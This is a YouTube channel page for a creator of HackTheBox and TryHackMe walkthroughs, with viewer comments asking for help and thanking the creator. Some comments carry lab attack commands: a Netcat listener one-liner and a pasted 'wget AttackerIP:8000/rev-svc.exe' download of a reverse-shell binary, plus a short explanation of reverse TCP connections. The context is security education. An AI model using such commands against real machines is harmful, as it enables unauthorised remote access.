stuffy24

stuffy24

Hey guysSTUFFY here! Hacker first, then Game fanatic and someone that wants to share knowledge and grow together!
Check out my twitter @Stuffy2224
Check out my twitch Twitch.tv/Stuffy24

Intro to Networking : HTB part 1.

Intro to Networking : HTB part 1.

The Best HoneyPots EVER?!

The Best HoneyPots EVER?!

Пікірлер

  • @lucassamuel2455
    @lucassamuel2455Күн бұрын

    Greetings Bro.. What do you think is the best order of study for these HTB Academy modules?

  • @stuffy24
    @stuffy24Күн бұрын

    That depends Def on your goals and what your experience level is

  • @lucassamuel2455
    @lucassamuel2455Күн бұрын

    @@stuffy24 I'm a beginner. I only know the basics of computer networking. My focus is Red Team

  • @stuffy24
    @stuffy24Күн бұрын

    @lucassamuel2455 I think your skipping steps then. I would focus on fundamentals of IT and then focus on security. Not skip IT.

  • @icee3126
    @icee3126Күн бұрын

    Can you help me with this msf6 auxiliary(scanner/smtp/smtp_version) > run [*] 10.10.176.209:25 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/smtp/smtp_version) > exploit [*] 10.10.176.209:25 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed when I press on the run or exploit i did not get the answer from it

  • @stuffy24
    @stuffy24Күн бұрын

    Feel free to throw your questions in the discord. Your simply running a scanner. I'm not sure which answer your looking for here.

  • @ChrisLinehan
    @ChrisLinehanКүн бұрын

    Hey man I really like your videos and the way you explain things. I did this module a few months and have moved well past it but every time I watch one of your videos I come away with a little something. Keep up the good work

  • @stuffy24
    @stuffy24Күн бұрын

    Hey thank you so much!! If you dont mind me asking for my own takeaway what did you take away from this one? I really appreciate the support!

  • @masai07
    @masai07Күн бұрын

    Thanks for such videos, you have been really helpful... I was literally doing subnetting today in HTB, for a while it has been a thorn in my studies. 😊 Grateful Nairobi, Kenya

  • @stuffy24
    @stuffy24Күн бұрын

    Subnetting is hard to explain without being able to write things down IMO

  • @masai07
    @masai0721 сағат бұрын

    @@stuffy24 yes it is

  • @stuffy24
    @stuffy2417 сағат бұрын

    @@masai07 it's easy once you get the hang of it!

  • @masai07
    @masai0712 сағат бұрын

    @@stuffy24 sure , like right now am trying to do the Vulnerability Assessment module on HTB.

  • @talhakhatib9514
    @talhakhatib9514Күн бұрын

    Thanks for teaching us❤❤

  • @stuffy24
    @stuffy24Күн бұрын

    Hopefully it helped!

  • @msat7755
    @msat77552 күн бұрын

    Great content man! I really like the HTB videos over the Tryhackme but I understand it’s probably easier to put out Tryhackme labs as there isn’t as much restrictions on going over the content. Personally I think the information you go over with the HTB labs is more informative as they dive a little deeper into the content.

  • @PlantYourWealth
    @PlantYourWealth2 күн бұрын

    This still going on ?

  • @hiimifranco2840
    @hiimifranco28402 күн бұрын

    Thanks dude. Hope learn much more like you said. Have a good day.

  • @stuffy24
    @stuffy242 күн бұрын

    You as well!

  • @talhakhatib9514
    @talhakhatib95142 күн бұрын

    Thanks bro for making this ❤❤ Really appreciated 💖

  • @stuffy24
    @stuffy242 күн бұрын

    Appreciate the support!

  • @user-qx7gh6ff1e
    @user-qx7gh6ff1e2 күн бұрын

    Could you do a q&a to talk about your background too? How you learned cybersecurity for example, etc..

  • @stuffy24
    @stuffy242 күн бұрын

    I'm happy to do a q&a in the discord. I have a few videos out that discuss my background.

  • @user-qx7gh6ff1e
    @user-qx7gh6ff1e2 күн бұрын

    @@stuffy24 ah ok thanks , I will Check it out

  • @Alexi-pj4yb
    @Alexi-pj4yb3 күн бұрын

    Hi Stuffy24 ! lifesaver, you saved me again, I agree with you we shouldn't be manipulating the script. If they wanted us to do it they would've said something. You're by far the best teaching these rooms ! I even watched some rooms in Arabic, Hindi, to try to follow but everybody else does confusing things. Thank you again !

  • @stuffy24
    @stuffy243 күн бұрын

    Appreciate the kind words. Thanks so much!

  • @Alexi-pj4yb
    @Alexi-pj4ybКүн бұрын

    @@stuffy24 You are helping me get my degree in cybersecurity ! You have a fan ! 😊

  • @stuffy24
    @stuffy24Күн бұрын

    @@Alexi-pj4yb well I appreciate the support! Make sure to hop in the discord for daily tips and more access to directly ask questions and things! Thanks again!

  • @Alexi-pj4yb
    @Alexi-pj4yb4 күн бұрын

    Just wanted to say THANK YOU ! Your videos and detailed explanations are helping me understand and get good grades in my cybersecurity classes. The THM and HTB are a fun way to learn pentesting but for noobies like me these rooms are hard !! You rock ! Keep up this great work !

  • @stuffy24
    @stuffy244 күн бұрын

    Hey thanks so much! Really appreciate the kind words

  • @PatrikLeng58
    @PatrikLeng584 күн бұрын

    what a stupid room. Ty for guide tho

  • @stuffy24
    @stuffy244 күн бұрын

    Not sure I agree but thank you for the kind words

  • @cyberdevil657
    @cyberdevil6574 күн бұрын

    Hey man i respect your walkthroughs i have a question for you. I'm looking for a duo youtuber so we can work togheter would it be okay if you can have a chat with me about maybe a future project togheter?

  • @stuffy24
    @stuffy244 күн бұрын

    You can message me on the discord to discuss

  • @cyberdevil657
    @cyberdevil6574 күн бұрын

    @@stuffy24 Lovely m8

  • @user-gu2jb3ht4h
    @user-gu2jb3ht4h5 күн бұрын

    ありがとうございます

  • @rickysimms51
    @rickysimms515 күн бұрын

    Thank you for making these videos

  • @stuffy24
    @stuffy245 күн бұрын

    Thanks for the kind words

  • @cyberdevil657
    @cyberdevil6575 күн бұрын

    Thank you so much! I broke my brain and i was stuck because i mistyped the password 5 times and i got confused lmao! This helped me!

  • @stuffy24
    @stuffy245 күн бұрын

    Glad it could help!

  • @ahmetkozan7302
    @ahmetkozan73026 күн бұрын

    Thank you so much!!!

  • @stuffy24
    @stuffy246 күн бұрын

    Thank you for the kind words

  • @thenextbigthing8998
    @thenextbigthing89986 күн бұрын

    bro when you gonna upload the video of nmap htb module ??? waiting for it

  • @stuffy24
    @stuffy246 күн бұрын

    I'm not. Htb banned me for that video. I can't upload anymore that aren't tier 0

  • @thenextbigthing8998
    @thenextbigthing89986 күн бұрын

    @@stuffy24 why they banned you bro?

  • @stuffy24
    @stuffy246 күн бұрын

    @@thenextbigthing8998 you can't do anything but tier 0 boxes

  • @thenextbigthing8998
    @thenextbigthing89986 күн бұрын

    @@stuffy24 bro let's get connected give me your discord i'll send you request

  • @livebreathehope1767
    @livebreathehope17676 күн бұрын

    Thank you so much. There is definitely not enough info in these exercises to get through them if you are a beginner.

  • @stuffy24
    @stuffy246 күн бұрын

    They are designed with assumptions I think!

  • @Chiwis-
    @Chiwis-7 күн бұрын

    Hey man I’m new to all this stuff but I was wondering if you can do like a guide on parrotsec and how to listen in

  • @stuffy24
    @stuffy247 күн бұрын

    How to listen in?

  • @Chiwis-
    @Chiwis-7 күн бұрын

    @@stuffy24 sorry i know that sounded dumb but i mean like a Netcat listener if that makes any sense

  • @humbertogomesruiz9820
    @humbertogomesruiz98206 күн бұрын

    To set a Netcat listener in a specific port, use the command: nc -lvnp [YOUR_PORT]

  • @stuffy24
    @stuffy246 күн бұрын

    @@Chiwis- parrot os is just a Debian Linux. It's done the same way as kali or any other

  • @andrewrx88
    @andrewrx887 күн бұрын

    thank you for giving the finer details!

  • @stuffy24
    @stuffy247 күн бұрын

    Thank you for the kind words

  • @nadjehelhamza3923
    @nadjehelhamza39237 күн бұрын

    A good content i learn some stuff thank you stuffy

  • @stuffy24
    @stuffy247 күн бұрын

    Appreciate you!

  • @nadjehelhamza3923
    @nadjehelhamza39237 күн бұрын

    Best stuffy continue

  • @stuffy24
    @stuffy247 күн бұрын

    I finished this series

  • @nadjehelhamza3923
    @nadjehelhamza39237 күн бұрын

    Hi stuffy why we need networks in our lives ?

  • @stuffy24
    @stuffy247 күн бұрын

    Depends on what you wanna do. If you wanna be in cyber then yes

  • @tathagataroy9650
    @tathagataroy96508 күн бұрын

    Frank's password's hash value is upto LR1

  • @Abc-sl1nf
    @Abc-sl1nf9 күн бұрын

    unfortunately, your face is in the way of the commands. thx

  • @stuffy24
    @stuffy249 күн бұрын

    They are all from the module. I will do this in the future though.

  • @stuffy24
    @stuffy249 күн бұрын

    If you want to see exclusive content and have the opportunity to game and chat with me about anything check out the patreon! Patreon to help support the channel! Thank you so much! patreon.com/stuffy24

  • @denis.petrovic
    @denis.petrovic9 күн бұрын

    Stil waiting for Part 2

  • @stuffy24
    @stuffy249 күн бұрын

    It will never come out. Htb doesn't allow it

  • @mahmoudabdelmenam-on5lf
    @mahmoudabdelmenam-on5lf11 күн бұрын

    great one

  • @stuffy24
    @stuffy2411 күн бұрын

    Thank you

  • @davidprato4781
    @davidprato478111 күн бұрын

    For those getting back blank scans, you've got to install Nessus locally, and then use OpenVPN to connect to then target machine. I cannot stress enough how crappy OpenVPN works on Windows. If you're doing TryHackMe Rooms at least have a local/live Linux machine.

  • @Br3chtV
    @Br3chtV12 күн бұрын

    Thank you so much for this video. Things got a lot clearer

  • @stuffy24
    @stuffy2412 күн бұрын

    Very happy to help!

  • @mavickharmor4819
    @mavickharmor481912 күн бұрын

    Thank you

  • @fredricksilas8407
    @fredricksilas840712 күн бұрын

    Why tf doesn't this have more views? He clearly explains it. I'm not the type of guy to read and learn i'm more of an audio visual type of guy. Why i'm here.

  • @stuffy24
    @stuffy2412 күн бұрын

    Appreciate it!

  • @michaelbrink9996
    @michaelbrink999613 күн бұрын

    hey, how do you run a reverse tcp connection on a pc that isnt on the same network? all the videos ive seen only shows internal networks

  • @stuffy24
    @stuffy2413 күн бұрын

    Well you have to ensure your using a port and protocol allowed through the firewall and then simply adjust the source but you have to have access inside the network that's why it's a reverse tcp connection. Your asking the pc to reach out to you.

  • @omarababneh304
    @omarababneh30413 күн бұрын

    really appreciate the effort

  • @stuffy24
    @stuffy2413 күн бұрын

    Thank you! I'll be finishing it up today hopefully!

  • @philiphardy7311
    @philiphardy731114 күн бұрын

    Love this, thank you!

  • @stuffy24
    @stuffy2414 күн бұрын

    Thank you for the kind words !

  • @ryaanlinux1174
    @ryaanlinux117414 күн бұрын

    Great video!!❤

  • @stuffy24
    @stuffy2414 күн бұрын

    Thanks! Appreciate the kind words

  • @firosiam7786
    @firosiam778614 күн бұрын

    Could u do vedios of the new evasion module introduced by hack the box

  • @stuffy24
    @stuffy2414 күн бұрын

    I can only do tier 0 boxes or they ban me.

  • @zmx6802
    @zmx68024 күн бұрын

    @@stuffy24nice videos. Keep it up! But why do they ban you?

  • @stuffy24
    @stuffy244 күн бұрын

    @@zmx6802 because they only allow tier 0 boxes to have walkthroughs on

  • @Diybeq
    @Diybeq15 күн бұрын

    brabo dos conteudos

  • @stuffy24
    @stuffy2415 күн бұрын

    Does this mean bad content or good content ? Lol

  • @gpilley1
    @gpilley115 күн бұрын

    Thanks for this video! I am doing the Penetrator Test on HTB and getting completely confused/struggling with a lot of this stuff. Videos like this really help even to show the mind set of how to pen test and the steps/process involved in joining the dots.

  • @stuffy24
    @stuffy2415 күн бұрын

    Thanks for the kind words

  • @gpilley1
    @gpilley115 күн бұрын

    @@stuffy24 anytime if you can keep them coming I would really appreciate it. Some of this stuff feels like I need a tutor to show me how it all works haha

  • @awecwec3720
    @awecwec372015 күн бұрын

    Is the free tier limited to 100gb per month?

  • @stuffy24
    @stuffy2415 күн бұрын

    You would have to look at the fine print.

  • @stuffy24
    @stuffy2415 күн бұрын

    You would have to look at the fine print.

  • @AnonymousUser11419
    @AnonymousUser1141916 күн бұрын

    so would this be capable of peroforming a distributed denial of service attack?

  • @stuffy24
    @stuffy2416 күн бұрын

    If you had bots but that's the distributed part

  • @rodrigozapata7113
    @rodrigozapata711316 күн бұрын

    bruh your content is 🔥🔥

  • @stuffy24
    @stuffy2416 күн бұрын

    Appreciate that !

  • @Diybeq
    @Diybeq17 күн бұрын

    brabo demais, thx for content

  • @stuffy24
    @stuffy2417 күн бұрын

    Appreciate the kind words

  • @ELASHWAL1000
    @ELASHWAL100017 күн бұрын

    did you pass the CPTS cert.?

  • @stuffy24
    @stuffy2417 күн бұрын

    I have no plans on taking it.

  • @ELASHWAL1000
    @ELASHWAL100017 күн бұрын

    @@stuffy24 hmm...do you think it's worth the time

  • @stuffy24
    @stuffy2417 күн бұрын

    @ELASHWAL1000 depends on the person and the goals. For me no it's not worth the time money or effort. For you maybe it is idk.

  • @pimpnameslickback790
    @pimpnameslickback79017 күн бұрын

    I'm trying to run this on kali linux but my only issue is that since i have kali install on a usb drive and i insert the command recon-ng it tells me [!] Unable to synchronize module index. (connection error). any help is well appreciated. thanks

  • @stuffy24
    @stuffy248 күн бұрын

    I would try to reinstall recon-ng and update the system

  • @talhakhatib9514
    @talhakhatib951418 күн бұрын

    Can you make video on Introduction to networking from Hack The Box Please make it

  • @stuffy24
    @stuffy2418 күн бұрын

    If it's tier 0 I can

  • @talhakhatib9514
    @talhakhatib951418 күн бұрын

    @@stuffy24 I don't really know what is tier in this. I am new If you check it and try to make a video with an explanation it will mean a lot to me because I don't totally understand while reading if someone explains it to me it helps a lot. I have watched your other hack the box video I like it that's why I am asking for your help so if you can please try. Thank you 💖🙃.

  • @stuffy24
    @stuffy2418 күн бұрын

    @talhakhatib9514 I understand and appreciate it but hack the box bans people if they make a video on anything other than tier 0

  • @talhakhatib9514
    @talhakhatib951417 күн бұрын

    @@stuffy24 okk bro check if it's possible then try.

  • @reclaimedgracewood
    @reclaimedgracewood18 күн бұрын

    this is so helpful! thank you !

  • @stuffy24
    @stuffy2418 күн бұрын

    Thank you for the kind words

  • @Socky_Nova
    @Socky_Nova18 күн бұрын

    hey stuffy, great vid, i cant wget my http.server from the attacker machine due to this error line: wget : Access to the path 'C: ev-svc.exe' is denied. At line:1 char:1 + wget AttackerIP:8000/rev-svc.exe -O rev-svc.exe + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], UnauthorizedAccessException + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand Any suggestions?

  • @alexlh_h
    @alexlh_h10 күн бұрын

    AttackerIP = THM attackbox's ip

  • @Socky_Nova
    @Socky_Nova9 күн бұрын

    @@alexlh_h yeah i know. I changed it back for the comment but thanks